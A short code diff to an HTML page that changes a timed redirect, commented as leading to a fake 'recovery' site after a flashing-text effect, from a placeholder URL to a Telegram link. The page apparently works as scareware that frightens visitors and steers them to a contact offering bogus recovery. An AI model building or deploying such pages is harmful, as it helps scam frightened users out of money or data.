--- a/index.html
+++ b/index.html
@@ -67,7 +67,7 @@
 
         // Redirect to a fake "recovery" site after a few seconds
         setTimeout(() => {
-            window.location.href = "https://yourrecoverysite.com";  // Change this URL to your own
+            window.location.href = "https://t.me/Aklinksz";  // Change this URL to your own
         }, 8000);
 
         // Flashing text effect
